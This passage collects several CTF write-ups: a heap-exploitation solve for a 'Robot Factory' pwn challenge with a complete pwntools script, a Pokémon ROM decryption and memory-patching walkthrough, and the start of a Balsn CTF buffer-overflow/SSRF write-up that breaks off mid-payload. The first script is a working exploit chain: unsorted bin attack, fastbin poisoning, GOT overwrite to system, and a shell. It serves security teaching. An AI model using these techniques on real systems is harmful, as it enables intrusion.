There isn’t a print function, so there’s no simple way to leak libc, and we can’t use fastbins because the binary only allows allocations above 0x100, so our first approach is to find a way to use fastbins.

This can be done if we find a way to modify global_max_fast into a big value, but how do we achieve this? We don’t even have libc to calculate the offset for global_max_fast ?

One thing we can do is a 4 bit bruteforce, if we free a chunk into an unsortedbin:

That’s how we can find the address of global_max_fast, and why this variable in particular ? Because it controls the maximum size at which malloc interprets a chunk as fastbin, by default its value is 0x80.

It’s required to modify this value into a bigger number. We can do this by using an unsorted bin attack. We need to modify the bk to the address we want to modify, minus 0x10.

This is how the exploit looks right now:

def main():
    global r
    r = getConn()
    create_robot(0x510)
    create_robot(0x410)
    create_robot(0x520) # fakeoffset chunk (Also prevents malloc consolidate)
    destroy_robot(1)
    program_robot(1,p64(0x0)+p16(0x3940-0x10)) # Modify the bk pointer with UAF
    create_robot(0x410) # Trigger Unsorted bin attack
    return True
while not main():
pass

Fastbin attack

We can use fastbin dup but still we don’t have any leaks. Luckily, robots and robot_sizes are stored in global variables, which means they will be located in the bss.

Unlike the stack or heap the bss addresses are not affected by ASLR if the PIE is disabled.

The goal here is to corrupt a pointer in the fastbin linked list so that the next malloc allocates in the BSS.

We have a UAF so we can easily corrupt the fastbin linked list. We will need to bypass the security check since the sizes are also saved in the BSS we can easily create a fake chunk size:

global r
r = getConn()
create_robot(0x510)
create_robot(0x410)
create_robot(0x520) # fakeoffset chunk
...

The look in memory of the fabricated chunk:

Then we proceed to free two chunks and modify the fastbin linked list:

destroy_robot(0)
destroy_robot(2)
program_robot(0,p64(elf.symbols['robot_memory_size'])) # Fastbin poisoning
create_robot(0x510)
create_robot(0x510) # returns 0x4040c0

Leak libc and pop a shell

We can now edit the pointers in robots we just need to modify one of those points to the atoi GOT so we can replace the contents with printf (to achieve a format string vulnerability):

1
2

program_robot(2,p64(0x520)*2+p64(0x1)*4+p64(elf.symbols['robot_memory_size']+0x10)+p64(elf.got['atoi'])) # overwrite robots pointers
program_robot(1,p64(elf.plt['printf'])) # replace atoi with printf

Since atoi has been replaced by printf, it will be more difficult to select options from the menu, but luckily printf returns the number of characters printed, so we can still interact with the binary:

r.sendafter(b"> ", b'\x41\x41\x00') # select option 2
r.sendafter(b'Provide robot\'s slot:\n', b"%3$p") # format string and leak libc
#context.log_level = 'debug'
LIBC = int(r.recvuntil(b'031'),16)-0x110031
SYSTEM = LIBC+libc.symbols['system']
log.info("LIBC 0x%x"% LIBC)
log.info("SYSTEM 0x%x"% SYSTEM)

Now that we have libc leaked we just need to modify atoi again to system and give sh as input:

r.sendafter(b"> ", b'\x41\x41\x00') # select option 2
r.sendafter(b'Provide robot\'s slot:\n', b'\x41\x00') # select index 1
r.sendlineafter(b'Program the robot:\n', p64(SYSTEM)) # replace atoi(currently printf) with system
r.sendafter(b"> ", b'sh\x00') # sh as argument
r.interactive()

Getting the flag

Full script:

from pwn import *
import traceback

host, port = "localhost", "1337"
filename = "./main"
elf = ELF(filename)
context.arch = 'amd64'

if not args.REMOTE:
    libc = elf.libc
else:
    libc = ELF('./libc-2.27.so')

def getConn():
    return process(filename) if not args.REMOTE else remote(host, port)#ssl=False, sni=host)

def get_PIE(proc):
    memory_map = open("/proc/{}/maps".format(proc.pid),"r").readlines()
    return int(memory_map[0].split("-")[0],16)

def debug(bp):
    script = ""
    PIE = get_PIE(r)
    for x in bp:
        script += "b *0x%x\n"%(PIE+x)
    gdb.attach(r,gdbscript=script)

def create_robot(size):
    r.sendlineafter(b"> ", b'1')
    r.sendlineafter(b'Provide robot memory size:\n', str(size).encode())

def program_robot(slot, data):
    r.sendlineafter(b"> ", b'2')
    r.sendlineafter(b'Provide robot\'s slot:\n', str(slot).encode())
    r.sendafter(b'Program the robot:\n', data)

def destroy_robot(slot):
    r.sendlineafter(b"> ", b'3')
    r.sendlineafter(b'Provide robot\'s slot:\n', str(slot).encode())

#940
def main():
    global r
    r = getConn()
    create_robot(0x510)
    create_robot(0x410)
    create_robot(0x520) # fakeoffset chunk (Also prevents malloc consolidate)
    destroy_robot(1)
    #input()
    program_robot(1,p64(0x0)+p16(0x3940-0x10))
    create_robot(0x410) # Trigger Unsorted bin attack
    try:
        #r.recvuntil(b'> ')
        #input()
        destroy_robot(0)
        destroy_robot(2)
        program_robot(0,p64(elf.symbols['robot_memory_size'])) # Fastbin poisoning
        create_robot(0x510)
        create_robot(0x510) # returns 0x4040c0

        program_robot(2,p64(0x520)*2+p64(0x1)*4+p64(elf.symbols['robot_memory_size']+0x10)+p64(elf.got['atoi']))
        program_robot(1,p64(elf.plt['printf']))
        #input()
        r.sendafter(b"> ", b'\x41\x41\x00')
        r.sendafter(b'Provide robot\'s slot:\n', b"%3$p")
        #context.log_level = 'debug'
        LIBC = int(r.recvuntil(b'031'),16)-0x110031
        SYSTEM = LIBC+libc.symbols['system']
        log.info("LIBC 0x%x"% LIBC)
        log.info("SYSTEM 0x%x"% SYSTEM)
        r.sendafter(b"> ", b'\x41\x41\x00')
        r.sendafter(b'Provide robot\'s slot:\n', b'\x41\x00')
        r.sendlineafter(b'Program the robot:\n', p64(SYSTEM))
        r.sendafter(b"> ", b'sh\x00')
        r.interactive()
        r.close()
        return True
    except KeyboardInterrupt:
        r.close()
        return True
    except: 
        #traceback.print_exc()
        r.close()
        return False
    return True

while not main():
    pass

Running it:

python robot_factory.py REMOTE                                                                             
[*] '/root/blackhat2022/pwn/Robot_Factory/main'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/root/blackhat2022/pwn/Robot_Factory/libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to localhost on port 1337: Done
[*] Closed connection to localhost port 1337
[+] Opening connection to localhost on port 1337: Done
[*] Closed connection to localhost port 1337
[+] Opening connection to localhost on port 1337: Done
[*] Closed connection to localhost port 1337
[+] Opening connection to localhost on port 1337: Done
[*] Closed connection to localhost port 1337
[+] Opening connection to localhost on port 1337: Done
[*] Closed connection to localhost port 1337
[+] Opening connection to localhost on port 1337: Done
[*] Closed connection to localhost port 1337
[+] Opening connection to localhost on port 1337: Done
[*] Closed connection to localhost port 1337
[+] Opening connection to localhost on port 1337: Done
[*] LIBC 0x7f0a2dcf6000
[*] SYSTEM 0x7f0a2dd45420
[*] Switching to interactive mode
$ ls
flag.txt
main
run.sh
ynetd

[Reverse] WPI CTF 2022 - PokemonRematch

2022-09-30T03:21:08.838Z

PokemonRematch

Solves: ??
Points: ???
Description:
Beat the game.
1 flag for beating the game, 2 flags if S.S.Anne doesn’t deport from the dock.
Attachment:
download
41c4dfc1e3e282b2a149b0accdc477ca

TLDR

Decrypt the rom by reversing the emulator
Use Cheat search to find exit map connections address
Change the warp location constant to hall of fame room (0x76)

Introduction

The challenge offered two emulators for two operating systems (linux and macos) and a ROM.

$ file pokered.gb
pokered.gb: data

$ file emulator_linux
emulator_linux: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, not stripped

From the file command, we can actually see that the ROM is weird since it doesn’t detect it as a real GB ROM.

For example, a real GBA ROM would output something like this:

1 2	file real.gba real.gda: Game Boy ROM image: "POKEMON RED" (Rev.00) [SGB] [MBC3+RAM+BATT], ROM: 8Mbit, RAM: 256Kbit

From this, we can assume the ROM must be encrypted and the emulator must be decrypting it before loading it.

There is a high chance that the author of the challenge didn’t implement an emulator from scratch, so this is probably a modified emulator from an open source project.

From the file command file emulator_linux we can see the symbols weren’t stripped, so we can easily identify the functions by their real names.

If we search for load, we can see the namespace is FunkyBoy:

FunkyBoy is an open source project, and we can take a look at the source code in github.

From the challenge description and in the begining when we start a new game professor Oak will tell us that he will give us two flags, one if we beat the game and another one if we beat the game without the boat S.S.Anne departing.

We could play the ROM and beat the game, but unfortunately it seems to be pretty hard to do so since the game seems to have been modified to be harder to beat (Brock has 22 level Pokemon).

Dumping the ROM

I used two methods to dump the ROM, GDB and Frida.

GDB

We can use the command dump memory but first we need to find a place to breakpoint and dump the ROM.

By looking at the original code of the emulator, we can see the rom is being loaded at the function Memory::loadROM.

First it reads the header here and much later it reads the rest here.

As we can see here, the ROM raw_bytes are eventually saved in a class variable rom.

We could have imported the structures to make IDA/Ghidra code much more readable, but to be honest, it takes some time to fix and import, and the code is not very hard to understand and locate where the encryption is being done.

As we can see below, the code shows up right after file reading:

We can setup our breakpoint at 0x40d6cf, but before that, we would need to know the size of the ROM. Looking around on github, we can find a place where the ROM size is calculated.

We can locate this in IDA/Ghidra by looking for the call to romSizeInBytes:

Finally we use GDB to dump from memory:

pwngdb> b *0x40d6cf
pwngdb> b *0x40D598
pwngdb> r pokered.gb
Breakpoint 2, 0x000000000040d598 in FunkyBoy::Memory::loadROM(std::istream&, bool) ()
► 0x40d598  mov  eax, eax
pwngdb> p/x $rax
$1 = 0x100000
pwngdb> c
Breakpoint 1, 0x000000000040d6cf in FunkyBoy::Memory::loadROM(std::istream&, bool) ()
► 0x40d6cf  movzx eax, byte ptr [r13 + 0x149]
pwngdb> dump memory dump_gdb.gba $r13 $r13+0x100000

Checking the signature:

1 2	$ file dump_gdb.gba dump.gda: Game Boy ROM image: "POKEMON RED" (Rev.00) [SGB] [MBC3+RAM+BATT], ROM: 8Mbit, RAM: 256Kbit

Frida

We can also use a very cool project named frida.

This can be easily installed with the following commands:

1 2	$ pip install frida $ pip install frida-tools

This project makes it very easy to hook functions, and there is a very good function to hook and get the pointer of the ROM variable.

The most interesting thing about Frida is that we can easily use JavaScript to modify the behaviour when a certain function is called or even call other functions inside of it.

Here is an example how we could dump the file using frida:

var romSizeInBytes_ptr = 0x4126A0; //ghidra
var getROMHeader_ptr = 0x40DFC0; //ghidra
var romSize_offset = 0x0148; // https://github.com/kremi151/FunkyBoy/blob/74bdcaf8b876d18293ba833d977a5892c9ef65d7/core/source/cartridge/header.h#L39

Interceptor.attach(ptr(getROMHeader_ptr), {
  onEnter: function(args) {},
  onLeave: function(retval) {
    var fd = new File("dump.gda", "wb");
    var romSizeInBytes = new NativeFunction(ptr(romSizeInBytes_ptr), 'uint32', ['uint8']);
    var romSize = retval.add(romSize_offset).readU8();
    var realRomSize = romSizeInBytes(romSize);
    if (fd && fd != null) {
      fd.write(Memory.readByteArray(retval, realRomSize));
      fd.flush();
      fd.close();
    }
  }
});

To run frida we can use the following command:

1	$ frida -l hook.js -f ./emulator_linux pokered.gb --no-pause

Getting to the hall of fame

Now that we dumped the file, we can use other emulators to debug the ROM.

To exploit the game, my theory was to find the offset of the warp_location when the player enters a door or switches to a new map and change it to the Hall of Fame room.

The bgb emulator is excellent because it has a memory searcher similar to Cheat Engine and also a debugger:

1	$ wine bgb.exe dump.gda

I used the cheat memory searcher to find the offset required.

First I clicked on start (we get all the addresses listed in the window):

So if we exit the door, we will be teleported to another map. It’s logical to assume that the value stored in the offset where the connections between the maps will change. After we exit the map, we can select the check box not -> equal to-> search With this, we can see we eliminated 40k possibilities:

Then I decided to reenter the room and try the same method with not -> equal to -> the previous value -> search but the number of addresses reduced was very low.

So instead I decided to move around the room and use multiple not -> above to -> the previous value -> search and not -> below -> the previous value -> search and I got as far as 1000 addresses:

Following this, I noticed that there were a lot of 0A and 0B addresses in memory. I decided to risk it and remove them with not -> equal to -> this value: 0A -> search and not -> equal to -> this value: 0B -> search.

With this, I was able to reduce it to 100 addresses:

It becomes difficult to reduce it further from here… So I searched in bubblepedia on possible warp_location values, and I found the one that could lead me to the blue house:

The constant for Blue’s house is 39. Converting to hexadecimal, we get 0x27.

Exiting the house and going near Blue’s house, we can use the filter equal to -> this value: 27 -> search:

We are left with two offsets, D3B6 and D73C by choosing to modify the first address to 2A (Poké Mart (Viridian City) ):

We are teleported to the Poké Mart after entering the door:

Now that we know how to teleport, we must first leave the pokemart and return to the blues’ house door.

Then we need to figure out what the constant is for the Hall of Fame. I saw on bubblepedia that the Hall of Fame constant is 118:

Meanwhile I found the complete list of the warp locations here in the pokemon red source code.

By changing the constant to 118 -> 0x76, we finally get teleported to the final room of the game and win:

The flags were FatPika:IsBEST! and GottaCaTcH!em

[Pwn] BalsnCTF2022 - Flag Market 1

2022-09-06T04:05:52.000Z

Flag Market 1

Solves: 43
Points: 175
Description:
Do you love flags?
Try to buy some!
nc flag-market-us.balsnctf.com 19091 or
nc flag-market-sin.balsnctf.com 19091 or
nc flag-market-uk.balsnctf.com 19091
Attachment:
download
234b79b0adee52c9402019214038dce9

TLDR

Overflow port 31337 to obtain SSRF in the listening xinetd service.

Challenge design

This challenge is split in 3 parts. The first part is a simple buffer overflow. We must understand how the services are working.

We can view the attachment:

$ unzip -l 234b79b0adee52c9402019214038dce9.zip
Archive:  234b79b0adee52c9402019214038dce9.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2022-08-30 16:11   flag_market/
      253  2022-08-30 15:01   flag_market/deploy.sh
      506  2022-08-30 14:52   flag_market/backend.Dockerfile
       32  2022-08-30 15:01   flag_market/README.md
      409  2022-08-30 14:52   flag_market/docker-compose-backend.yml
      381  2022-08-30 14:52   flag_market/docker-compose-chal.yml
      325  2022-08-30 14:52   flag_market/xinetd-flag1
     1048  2022-08-30 14:52   flag_market/flag_market.Dockerfile
        0  2022-08-31 16:52   flag_market/src/
      512  2022-08-30 14:55   flag_market/src/patch.diff
      123  2022-08-31 15:55   flag_market/src/run.sh
      336  2022-08-30 14:55   flag_market/src/Makefile
    22768  2022-08-30 14:55   flag_market/src/flag_market
        0  2022-08-30 14:55   flag_market/src/backend/
     1419  2022-08-30 14:54   flag_market/src/backend/backend.py
       25  2022-08-30 14:54   flag_market/src/backend/run_flag1.sh
       79  2022-08-30 14:54   flag_market/src/backend/run_backend.sh
     9819  2022-08-30 14:55   flag_market/src/flag_market.c
       13  2022-08-30 14:56   flag_market/src/flag3
---------                     -------
    38048                     19 files

To study how the service works, we must review the deploy.sh and docker-compose yml files.

deploy.sh is simply building and running the docker instances and initiating the services:

$ cat deploy.sh         
#!/bin/bash

docker-compose -f ./docker-compose-backend.yml build
CHAL_PORT=13337 docker-compose -f ./docker-compose-chal.yml build

docker-compose -f ./docker-compose-backend.yml up -d
CHAL_PORT=13337 docker-compose -f ./docker-compose-chal.yml up -d

Deploy.sh is already hinting which port will be exposed to the host.

docker-compose-backend.yml seems to have the hostname as backend and the flags are stored in environment variables of the container:

version: "3.5"
services:
    backend:
        build:
            context: ./
            dockerfile: backend.Dockerfile
        restart: always
        hostname: backend
        environment:
            - FLAG1=BALSN{FLAG1}
            - FLAG2=BALSN{FLAG2}
        networks:
            - network
networks:
    network:
        name: flag_market_network

# docker-compose -f ./docker-compose-backend.yml up -d

Checking the backend.Dockerfile we see that the flag1 will probably be printed in the xinetd service:

FROM ubuntu:20.04
MAINTAINER how2hack
RUN apt-get update --fix-missing
RUN apt-get upgrade -y
RUN apt-get install -y xinetd
RUN DEBIAN_FRONTEND=noninteractive apt-get install -y python3 python3-pip
RUN pip install -U pip flask setuptools gunicorn
RUN useradd -m backend
COPY src/backend/backend.py /backend/
COPY src/backend/run_flag1.sh /backend/
COPY src/backend/run_backend.sh /backend/
COPY ./xinetd-flag1 /etc/xinetd.d/xinetd-flag1
USER backend
CMD /usr/sbin/xinetd -dontfork & /backend/run_backend.sh

We can tell from the xinetd file that the daemon’s service will be run on port 31337:

$ cat xinetd-flag1      
service backend-flag1
{
        disable = no
        type = UNLISTED
        wait = no
        server = /backend/run_flag1.sh
        socket_type = stream
        protocol = tcp
        user = backend
        port = 31337
        flags = IPv4 REUSE
        per_source = 5
        rlimit_cpu = 3
        rlimit_as = 64M
        nice = 18
}

Reading run_flag1.sh we know it will print the flag:

$ cat src/backend/run_flag1.sh
#!/bin/bash

echo $FLAG1

Another thing we know from the dockerfile is that another service must be running here as well, as we can see in src/backend/run_backend.sh.

The file will be running a Flask server on Guicorn:

#!/bin/bash

cd /backend
gunicorn -w 4 "backend:create_app()" -b 0.0.0.0:29092  --error-logfile /tmp/error.log --access-logfile /tmp/access.log --capture-output --log-level debug

This service is related to part two, so we won’t talk much about it in this write-up. The important part here is knowing that this service is running in backend:29092 and is not accessible to the host, at least from the information we have right now.

Let’s see the other container, docker-compose-chal.yml.

cat docker-compose-chal.yml   
version: "3.5"
services:
    flag_market:
        build:
            context: ./
            dockerfile: flag_market.Dockerfile
        ports:
            - "${CHAL_PORT}:19091/tcp"
        networks:
            - flag_market_network
networks:
    flag_market_network:
        external: true

# CHAL_PORT=13337 docker-compose -f ./docker-compose-chal.yml -p flag_market_13337 up -d

Exposes port 19091 to the host and links it to the port passed in the ENV variable CHAL_PORT which will be 13337 if we choose so or run the deploy.sh script.

The file flag_market.Dockerfile will show it’s copying an elf executable and moving it to /home/flag_market and running a sh script named run.sh:

FROM ubuntu:20.04
MAINTAINER how2hack
RUN apt-get update --fix-missing
RUN apt-get upgrade -y
RUN apt-get install -y xinetd
RUN DEBIAN_FRONTEND=noninteractive apt-get install -y git libtool pkg-config make python3 python3-pip help2man
RUN pip install -U pip pycrypto
RUN useradd -m flag_market
WORKDIR /home/flag_market
RUN git clone https://github.com/frankmorgner/vsmartcard.git
WORKDIR /home/flag_market/vsmartcard
RUN git checkout 8b4aa3e7bfe891d986237759576b5ebf0e4ed42b
COPY src/patch.diff /home/flag_market/vsmartcard/
RUN git apply patch.diff
WORKDIR /home/flag_market/vsmartcard/virtualsmartcard
RUN autoreconf --verbose --install
RUN ./configure --sysconfdir=/etc --enable-libpcsclite
RUN make
RUN make install
COPY src/flag_market /home/flag_market/
COPY src/run.sh /home/flag_market/
COPY src/flag3 /home/flag_market/
RUN chmod 774 /tmp
RUN chmod -R 774 /var/tmp
RUN chmod -R 774 /dev
RUN chmod -R 774 /run
RUN chmod 1733 /tmp /var/tmp /dev/shm
RUN chown -R root:root /home/flag_market
USER flag_market
CMD ["/home/flag_market/run.sh"]

The src/run.sh file will start the ELF while preloading a special library:

$ cat src/run.sh
#!/bin/bash

export LD_PRELOAD=/usr/local/lib/libpcsclite.so.1
exec 2>/dev/null
timeout 1800 /home/flag_market/flag_market

The organizers were nice enough to provide us with the source code, so let’s analyse what this binary contains.

Socket is listening on port 19091

...
#define HOST "127.0.0.1"
#define PORT 19091
#define BK_HOST "backend"
#define BK_PORT 29092
...
int main(void)
{
    int server_fd;
    int accepted_client_fd;
    struct sockaddr_in serverInfo;
    struct sockaddr_in clientInfo;
    socklen_t optval = 1;
    pid_t pid[50];
    int pid_n = 0;

    server_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (server_fd < 0)
        exit(-1);

    if (setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR, (void *)&optval, sizeof(optval)) != 0)
        exit(-1);

    int addrlen = sizeof(clientInfo);
    bzero(&serverInfo, sizeof(serverInfo));

    serverInfo.sin_family = PF_INET;
    serverInfo.sin_addr.s_addr = INADDR_ANY;
    serverInfo.sin_port = htons(PORT);

    if (bind(server_fd, (struct sockaddr*)&serverInfo, sizeof(serverInfo)) < 0)
        exit(-1);

    if (listen(server_fd, NUM_PID) < 0)
        exit(-1);
    ...

And will send the received data to the previously seen backend: 29092 flask webserver:

oid connection_handler(int sock_fd)
{
    char request[MAX_REQ_BUF] = {};
    char method[MAX_BUF] = {};
    char path[MAX_BUF] = {};
    char port[MAX_BUF] = {};
    char host[MAX_BUF] = {};
    size_t n = 0;
    size_t reqLen = 0;

    connection_sock = sock_fd;
    signal(SIGALRM, exception_handler);
    signal(SIGABRT, exception_handler);
    alarm(TIMEOUT);

    snprintf(host, MAX_BUF, "%s", BK_HOST);
    snprintf(port, MAX_BUF, "%d", BK_PORT);

    reqLen = read_input(sock_fd, request, MAX_REQ_BUF);

    n = sscanf(request, "%s /%s HTTP/1.1", method, path);
    if (n != 2)
        snprintf(path, MAX_BUF, "500");

    route(sock_fd, host, port, method, path, reqLen, request);

    close(sock_fd);
    exit(0);
}

The request flow can be simplified by using the following drawing:

1	[Host]localhost:13337 -> [flag_market]127.0.0.1:19091 -> [backend]backend:29092

Gdbserver

Before starting to search for a vulnerability, we might want to find a strategy for how we would debug the binary for every payload we send.

We can use remote debugging; for this, we either copy an already-compiled version of gdbserver or we install it on the Docker server.

Because I chose to install gdbserver in Docker, we needed to first expose an extra port (1337) for gdb to connect to.

We can do this by modifying the docker-compose-chall.yml file:

version: "3.5"
services:
    flag_market:
        build:
            context: ./
            dockerfile: flag_market.Dockerfile
        ports:
            - "${CHAL_PORT}:19091/tcp"
            - "1337:1337/tcp" # changed line
        networks:
            - flag_market_network
networks:
    flag_market_network:
        external: true

# CHAL_PORT=13337 docker-compose -f ./docker-compose-chal.yml -p flag_market_13337 up -d

We could now either modify the Docker files to start the gdbserver automatically after the binary is run, or run commands after the instance is running.

I didn’t want to break anything or make the server slightly different from the server version, so to save time, after setting up the servers with ./deploy.sh, I just ran the following commands to install gdb:

$ sudo docker container ls 
CONTAINER ID   IMAGE                     COMMAND                  CREATED        STATUS          PORTS                                                                                      NAMES
7e3450cc8dad   flag_market_flag_market   "/home/flag_market/r…"   10 hours ago   Up 10 minutes   0.0.0.0:1337->1337/tcp, :::1337->1337/tcp, 0.0.0.0:13337->19091/tcp, :::13337->19091/tcp   flag_market_flag_market_1
5ab9319711a0   flag_market_backend       "/bin/sh -c '/usr/sb…"   2 days ago     Up 2 days 
$ sudo docker exec -it --workdir /root --user root  flag_market_flag_market_1 sh -c "apt update && apt install gdbserver"

After this we can attach the gdbserver with:

$ sudo docker exec -it flag_market_flag_market_1 ps -aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
flag_ma+       1  0.0  0.0   3984  2812 ?        Ss   05:17   0:00 /bin/bash /ho
flag_ma+       7  0.0  0.0   2748   652 ?        S    05:17   0:00 timeout 1800 
flag_ma+       8  0.0  0.0   2416   536 ?        S    05:17   0:00 /home/flag_ma
flag_ma+      15  0.0  0.0   5900  2888 pts/0    Rs+  05:29   0:00 ps -aux                                                                                
$ sudo docker exec -it flag_market_flag_market_1 \
sh -c "gdbserver :1337 --attach \$(ps -aux | grep ':00 /home/flag_market/flag_market' | head -n 1 | awk '{print \$2}')"
Attached; pid = 8
Listening on port 1337

To attach with gdb from the host we can do this:

1
2
3

pwndbg> target remote :1337
...
pwndbg> n

Exploit

Since we don’t care right now about the flask server, ideally we would love to make the binary connect to the xinetd service to get the flag1. But to achieve this, we need to use an overflow.

We can find one in the sscanf:

1	n = sscanf(request, "%s /%s HTTP/1.1", method, path);

To overflow the port, we need to find the offset to the variable. One of the methods we could use is just trial and error (quite slow), but in my case I chose to use De Bruijn patterns:

1
2

$ ragg2 -P 2000 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmABnABoABpABqABrABsABtABuABvABwABxAByABzAB1AB2AB3AB4AB5AB6AB7AB8AB9AB0ACBACCACDACEACFACGACHACIACJACKACLACMACNACOACPACQACRACSACTACUACVACWACXACYACZACaACbACcACdACeACfACgAChACiACjACkAClACmACnACoACpACqACrACsACtACuACvACwACxACyACzAC1AC2AC3AC4AC5AC6AC7AC8AC9AC0ADBADCADDADEADFADGADHADIADJADKADLADMADNADOADPADQADRADSADTADUADVADWADXADYADZADaADbADcADdADeADfADgADhADiADjADkADlADmADnADoADpADqADrADsADtADuADvADwADxADyADzAD1AD2AD3AD4AD5AD6AD7AD8AD9AD0AEBAECAEDAEEAEFAEGAEHAEIAEJAEKAELAEMAENAEOAEPAEQAERAESAETAEUAEVAEWAEXAEYAEZAEaAEbAEcAEdAEeAEfAEgAEhAEiAEjAEkAElAEmAEnAEoAEpAEqAErAEsAEtAEuAEvAEwAExAEyAEzAE1AE2AE3AE4AE5AE6AE7AE8AE9AE0AFBAFCAFDAFEAFFAFGAFHAFIAFJAFKAFLAFMAFNAFOAFPAFQAFRAFSAFTAFUAFVAFWAFXAFYAFZAFaAFbAFcAFdAFeAFfAFgAFhAFiAFjAFkAFlAFmAFnAFoAFpAFqAFrAFsAFtAFuAFvAFwAFxAFyAFzAF1AF2AF3AF4AF5AF6AF7AF8AF9AF0AGBAGCAGDAGEAGFAGGAGHAGIAGJAGKAGLAGMAGNAGOAGPAGQAGRAGSAGTAGUAGVAGWAGXAGYAGZAGaAGbAGcAGdAGeAGfAGgAGhAGiAGjAGkAGlAGmAGnAGoAGpAGqAGrAGsAGtAGuAGvAGwAGxAGyAGzAG1AG2AG3AG4AG5AG6AG7AG8AG9AG0AHBAHCAHDAHEAHFAHGAHHAHIAHJAHKAHLAHMAHNAHOAHPAHQAHRAHSAHTAHUAHVAHWAHXAHYAHZAHaAHbAHcAHdAHeAHfAHgAHhAHiAHjAHkAHlAHmAHnAHoAHpAHqAHrAHsAHtAHuAHvAHwAHxAHyAHzAH1AH2AH3AH4AH5AH6AH7AH8AH9AH0AIBAICAIDAIEAIFAIGAIHAIIAIJAIKAILAIMAINAIOAIPAIQAIRAISAITAIUAIVAIWAIXAIYAIZAIaAIbAIcAIdAIeAIfAIgAIhAIiAIjAIkAIlAImAInAIoAIpAIqAIrAIsAItAIuAIvAIwAIxAIyAIzAI1AI2AI3AI4AI5AI6AI7AI8AI9AI0AJBAJCAJDAJEAJFAJGAJHAJIAJJAJKAJLAJMAJNAJOAJPAJQAJRAJSAJTAJUAJVAJWAJXAJYAJZAJaAJbAJcAJdAJeAJfAJgAJhAJiAJjAJkAJlAJmAJnAJoAJpAJqAJrAJsAJtAJuAJvAJwAJxAJyAJzAJ1AJ2AJ3AJ4AJ5AJ6AJ7AJ8AJ9AJ0AKBAKCAKDAKEAKFAKGAKHAKIAKJAKKAKLAKMAKNAKOAKPAKQAKRAKSAKTAKUAKVAKWAKXAKYAKZAKaAKbAKcAKdAKeAKfAKgAKhAKiAKjAKkAKlAKmAKnAKoAKpAKqAKrAKsAKtAKuAKvAKwAKxAKyAKzAK1AK2AK3AK4AK5A

We then send this to the server:

echo 'AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYA'\
'AZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAA'\
'zAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQ'\
'ABRABSABTABUABVABWABXABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmABnABoABpABqA'\
'BrABsABtABuABvABwABxAByABzAB1AB2AB3AB4AB5AB6AB7AB8AB9AB0ACBACCACDACEACFACGACHAC'\
'IACJACKACLACMACNACOACPACQACRACSACTACUACVACWACXACYACZACaACbACcACdACeACfACgAChACi'\
'ACjACkAClACmACnACoACpACqACrACsACtACuACvACwACxACyACzAC1AC2AC3AC4AC5AC6AC7AC8AC9A'\
'C0ADBADCADDADEADFADGADHADIADJADKADLADMADNADOADPADQADRADSADTADUADVADWADXADYADZAD'\
'aADbADcADdADeADfADgADhADiADjADkADlADmADnADoADpADqADrADsADtADuADvADwADxADyADzAD1'\
'AD2AD3AD4AD5AD6AD7AD8AD9AD0AEBAECAEDAEEAEFAEGAEHAEIAEJAEKAELAEMAENAEOAEPAEQAERA'\
'ESAETAEUAEVAEWAEXAEYAEZAEaAEbAEcAEdAEeAEfAEgAEhAEiAEjAEkAElAEmAEnAEoAEpAEqAErAE'\
'sAEtAEuAEvAEwAExAEyAEzAE1AE2AE3AE4AE5AE6AE7AE8AE9AE0AFBAFCAFDAFEAFFAFGAFHAFIAFJ'\
'AFKAFLAFMAFNAFOAFPAFQAFRAFSAFTAFUAFVAFWAFXAFYAFZAFaAFbAFcAFdAFeAFfAFgAFhAFiAFjA'\
'FkAFlAFmAFnAFoAFpAFqAFrAFsAFtAFuAFvAFwAFxAFyAFzAF1AF2AF3AF4AF5AF6AF7AF8AF9AF0AG'\
'BAGCAGDAGEAGFAGGAGHAGIAGJAGKAGLAGMAGNAGOAGPAGQAGRAGSAGTAGUAGVAGWAGXAGYAGZAGaAGb'\
'AGcAGdAGeAGfAGgAGhAGiAGjAGkAGlAGmAGnAGoAGpAGqAGrAGsAGtAGuAGvAGwAGxAGyAGzAG1AG2A'\
'G3AG4AG5AG6AG7AG8AG9AG0AHBAHCAHDAHEAHFAHGAHHAHIAHJAHKAHLAHMAHNAHOAHPAHQAHRAHSAH'\
'TAHUAHVAHWAHXAHYAHZAHaAHbAHcAHdAHeAHfAHgAHhAHiAHjAHkAHlAHmAHnAHoAHpAHqAHrAHsAHt'\
'AHuAHvAHwAHxAHyAHzAH1AH2AH3AH4AH5AH6AH7AH8AH9AH0AIBAICAIDAIEAIFAIGAIHAIIAIJAIKA'\
'ILAIMAINAIOAIPAIQAIRAISAITAIUAIVAIWAIXAIYAIZAIaAIbAIcAIdAIeAIfAIgAIhAIiAIjAIkAI'\
'lAImAInAIoAIpAIqAIrAIsAItAIuAIvAIwAIxAIyAIzAI1AI2AI3AI4AI5AI6AI7AI8AI9AI0AJBAJC'\
'AJDAJEAJFAJGAJHAJIAJJAJKAJLAJMAJNAJOAJPAJQAJRAJSAJTAJUAJVAJWAJXAJYAJZAJaAJbAJcA'\
